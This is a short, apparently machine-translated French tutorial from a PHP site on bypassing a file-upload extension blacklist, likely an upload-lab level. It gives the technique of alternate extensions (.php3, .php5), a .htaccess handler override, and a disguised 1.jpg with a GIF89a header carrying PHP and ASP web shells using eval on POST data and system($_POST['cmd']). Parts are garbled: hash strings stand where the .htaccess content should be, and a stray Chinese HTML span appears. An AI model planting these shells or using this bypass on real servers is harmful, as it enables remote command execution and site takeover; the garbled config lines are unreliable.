Comment contourner la liste noire lors du téléchargement de fichiers

Cet article présente principalement la méthode pour contourner la liste noire en téléchargeant des fichiers. Il a une certaine valeur de référence. Maintenant, je le partage avec vous. Les amis dans le besoin peuvent s'y référer

Ce niveau consiste principalement à définir le téléchargement. suffixe. , restreignant les suffixes tels que asp, php, jsp, etc., et le téléchargement n'est pas autorisé.

Position 1 : Cette méthode de contournement consiste à modifier le suffixe en .php3, php5, etc. Voici la vérification de la liste noire ('.asp', '.aspx', '.php', '.jsp' ) , nous pouvons télécharger php3, php5... et d'autres noms de suffixes qui peuvent être analysés par le serveur

Position 2 : Réécrire les règles d'analyse des fichiers pour contourner

1. Téléchargez d'abord un fichier nommé .htaccess avec le contenu suivant :

7dbec1342203bda950e5c4d4c26c928b

Application SetHandler /x-httpd-php

d4f50085796fcbc8b99545763f01d848

2. Téléchargez le script 1.jpg

contenu :

GIF89a
<?php eval($_POST[&#39;joker&#39;]);?>
<%eval request("joker")%>
<?php system($_POST[&#39;cmd&#39;]);?>

<span style='margin: 0px; padding: 0px; color: #ff00ff; line-height: 1.5 !important; font-family: "Courier New" !important; font-size: 12px !important'><br>最后查看结果如下：<br><img src="https://img.php.cn/upload/article/000/000/009/8c177c6b99f31ac79c542a12d4053de9-3.png" alt=""><br></span>

Ce qui précède est l'intégralité du contenu de cet article, j'espère que ce sera le cas. être utile à l'étude de chacun. Plus Pour plus de contenu connexe, veuillez faire attention au site Web PHP chinois !

Recommandations associées :

PHP utilise Azure Storage Blob pour télécharger des fichiers

Introduction à la mise en cache Nginx Memcache

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!